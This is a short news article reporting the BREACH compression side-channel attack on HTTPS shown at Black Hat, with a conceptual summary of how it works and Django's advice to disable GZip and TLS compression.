14 DAY TRIAL // At the latest Black Hat conference, researchers have demonstrated a new attack against HTTPS traffic. Dubbed “BREACH,” short for Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext, the attack method can be used to grab sensitive information from HTTPS traffic in only a few seconds.
Salesforce.com lead product security engineer Angelo Prado, Square application security engineer Neal Harris, and Salesforce.com lead security engineer Yoel Gluck are the ones who discovered and presented this attack method.
“This relies on the attacker being able to observe the size of the cipher text received by the browser while triggering a number of strategically crafted requests to a target site,” reads a report from Prado that was picked up by US CERT.
“To recover a particular secret in an HTTPS response body, the attacker guesses character by character, sending a pair of requests for each guess. The correct guess will result in a smaller HTTPS response. For each guess the attacker coerces the victim's browser to issue two requests,” the advisory continues.
“If the size of the first response is smaller than the second response, this indicates that the guess has a good chance of being correct.”
After the news broke, representatives of Django, the free open-source web application framework, have issued an alert to warn customers that the BREACH attack can be used to compromise Django’s CSRF protection.
Django advises users to disable Django’s GZip middleware, or disable GZip compression on their web server’s config, depending on how their application is deployed.
“Additionally, you should make sure you disable TLS compression by adjusting your server's SSL ciphers,” Django noted.
The web application framework’s developers plan on addressing BREACH in Django itself, but in the meantime, customers are recommended to take the aforementioned steps to protect themselves.